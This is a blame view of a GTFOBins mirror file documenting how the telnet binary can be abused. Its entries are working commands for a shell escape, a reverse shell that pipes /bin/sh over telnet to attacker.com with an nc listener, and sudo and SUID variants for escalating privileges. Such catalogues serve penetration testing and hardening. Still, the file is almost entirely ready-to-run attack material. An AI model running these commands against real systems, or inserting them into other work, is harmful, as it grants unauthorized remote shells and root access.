1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-19 02:11:39 +02:00
GTFOBins.github.io/_gtfobins/telnet.md

36 lines
850 B
Markdown
Raw Normal View History

2018-05-21 21:14:41 +02:00
---
functions:
2018-05-25 15:30:02 +02:00
execute-interactive:
2018-07-04 20:26:52 +02:00
- description: BSD version only. Needs to be connected first.
code: |
RHOST=attacker.com
RPORT=12345
telnet $RHOST $RPORT
^]
!/bin/sh
2018-05-25 15:30:02 +02:00
reverse-shell-interactive:
2018-07-04 20:26:52 +02:00
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
TF=$(mktemp)
rm $TF
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
2018-05-21 21:14:41 +02:00
sudo-enabled:
2018-07-04 20:26:52 +02:00
- description: BSD version only. Needs to be connected first.
code: |
RHOST=attacker.com
RPORT=12345
sudo telnet $RHOST $RPORT
^]
!/bin/sh
2018-05-21 21:14:41 +02:00
suid-limited:
2018-07-04 20:26:52 +02:00
- description: BSD version only. Needs to be connected first.
code: |
RHOST=attacker.com
RPORT=12345
./telnet $RHOST $RPORT
^]
!/bin/sh
2018-05-21 21:14:41 +02:00
---